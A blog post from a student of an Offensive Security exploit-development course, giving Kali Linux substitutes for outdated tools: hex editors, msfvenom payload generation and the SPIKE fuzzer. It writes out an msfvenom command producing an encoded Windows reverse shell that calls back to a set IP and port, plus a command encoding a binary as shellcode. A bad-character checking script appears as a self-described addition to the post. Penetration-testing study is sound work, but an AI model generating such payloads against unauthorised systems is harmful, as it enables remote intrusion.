For the past month or so I’ve been working through the Cracking the Perimeter course from Offensive Security. I have been enjoying the course, however the materials all reference BackTrack Linux and not its replacement, Kali Linux. For a variety of reasons I’ve decided to plug away at the course with Kali Linux as opposed to the recommended distro. While you can perform the majority of the course without issue using Kali, there are times where the course materials reference dated tools that are either a) no longer available or b) do not function as demonstrated in the course materials.
I’ve decided to throw together this blog post to help anyone else who’s decided to tackle the course with the newer technologies, while doing my best not to give away any specifics of the course materials. Now it can be argued that a student spending the time to learn the newer technologies is a valuable learning experience, and I would agree, but I would imagine that the majority of students are having a lot of new material thrown at them, and not having to second-guess whether your tooling is correct can really cut down on the frustration of exploit development.
- Hex Editors
The course references the usage of the application Hexedit, which does not come packaged with Kali. I downloaded and installed the newest version and noticed that the UI looked different from the one muts demonstrates, and there is a bit of a learning curve with the commands. For this I offer two potential solutions.
Download and install Bless:

```shell
apt-get install bless
```

And utilize the following command to open your file:

```shell
bless <application>
```
Now one very weird bug I’ve noticed with Bless is that you can’t simply “save” a file you’ve been working on. You’ll always get a weird error telling you there isn’t enough space.
The solution to this is to “Save As” – kind of a pain, but an easy workaround.
Your second option is to use Vim. If you’re not familiar with Vim then you’ll notice that there’s a bit of a learning curve here as well, so Bless might be a better option. If you enjoy working with Vim, as I do, then you can use the following command to turn the buffer into an editable hex dump:

```vim
:%!xxd
```

Once you have made your changes, run `:%!xxd -r` to convert the dump back into binary before writing the file; otherwise you will save the text of the hex dump rather than the binary itself.
- Generating & Encoding Payloads
Throughout the course there are several instances where the msfpayload and msfencode commands are used to generate payloads and encode them respectively. These have of course both been deprecated in favour of msfvenom, which performs both of those tasks. The course materials reference creating a payload in a Raw format, dumping it into a file and then using that file as input for your encoding. This process is made much easier with msfvenom.
Sample msfvenom command for encoded reverse shell code:

```shell
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.0.10 LPORT=9998 -v shell -f python -b "\x00\x2e"
```
-p specifies the payload
-e specifies the encoding for the payload
LHOST states the IP address to dial back to
LPORT states the port to dial back on
-v allows you to specify the variable name for the shellcode
-f lets you specify the shellcode format (python in this case)
-b specifies any bad characters you wish the shellcode to avoid
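A check worth running on what the command above produces: the following is an added example (mine, not from the course or from this post) that re-assembles the bytes from msfvenom’s `-f python` output for a variable named `shell` and confirms none of the `-b` bad characters remain. The two samples are constructed placeholders in the shape of that output, not shellcode.

```python
import re

# Constructed samples in the shape of `msfvenom ... -v shell -f python` output.
# The byte values are arbitrary placeholders, not shellcode.
SAMPLE_CLEAN = r'''shell =  b""
shell += b"\x90\x41\x42\x43\x44\x45"
shell += b"\x46\x47\x48\xff\xfe\xc3"
'''
# Same shape, but \x2e and \x00 (the -b bad characters) slipped through.
SAMPLE_TAINTED = r'''shell =  b""
shell += b"\x90\x41\x2e\x43"
shell += b"\x00\x47"
'''

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_bad_chars(spec):
    """Turn the -b argument as typed in the shell (e.g. \\x00\\x2e) into bytes."""
    return bytes.fromhex("".join(_HEX_ESCAPE.findall(spec)))


def parse_python_format(text, var="shell"):
    """Re-assemble the bytes from msfvenom's python-format output.

    Matches `var = b"..."` and `var += b"..."` lines; the leading b is
    optional so older, str-based output parses as well.
    """
    line_re = re.compile(
        rf'^{re.escape(var)}\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{{2}})*)"', re.M
    )
    hex_pairs = []
    for chunk in line_re.findall(text):
        hex_pairs.extend(_HEX_ESCAPE.findall(chunk))
    return bytes.fromhex("".join(hex_pairs))


def find_bad_chars(shellcode, bad):
    """Return (offset, byte) for every bad character present in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


if __name__ == "__main__":
    bad = parse_bad_chars(r"\x00\x2e")
    for name, sample in (("clean", SAMPLE_CLEAN), ("tainted", SAMPLE_TAINTED)):
        hits = find_bad_chars(parse_python_format(sample), bad)
        print(name, "OK" if not hits else f"bad chars at {hits}")
```

Paste the real `-f python` output over one of the samples (or read it from a file) and the script reports the offset of any byte the encoder failed to exclude.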
- Encoding a binary file with msfvenom
There is an example in the course where you will be expected to create shellcode from a binary file. The course materials reference the outdated tools, but the following command will allow you to ingest a binary file and encode it:

```shell
cat file.bin | msfvenom -p - -a x86 --platform windows -e x86/shikata_ga_nai -f perl
```
Breaking down the above command:
– The binary file is cat’d and piped into msfvenom on standard input
-p - tells msfvenom to read the payload from standard input rather than use one of its built-in payloads
-a specifies an x86 architecture
--platform windows (should be pretty self explanatory)
-e specifies the shikata_ga_nai encoder
-f specifies the perl output format
- Using Spike
Fuzzing demonstrations throughout the course are performed using the SPIKE fuzzing framework, which apparently no longer ships with Kali Linux. To get up and running with SPIKE use the following:

```shell
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xvzf SPIKE2.9.tgz
```

With the framework downloaded and unpacked you’ll need to navigate to the src directory to utilize the application:

```shell
cd SPIKE/SPIKE/src
```
There you’ll find the audits folder and the executables referenced in the course materials.
And there you have it – I hope someone gets some use out of these tips and tricks. It is worth noting that Offensive Security does not mandate that you use the tools they provide in the exam, so it’s a good idea to play around with different tools and work with those you feel comfortable with. Rather than using the SPIKE framework you may choose to use Sulley, or rather than using OllyDbg you may opt for something like Immunity instead.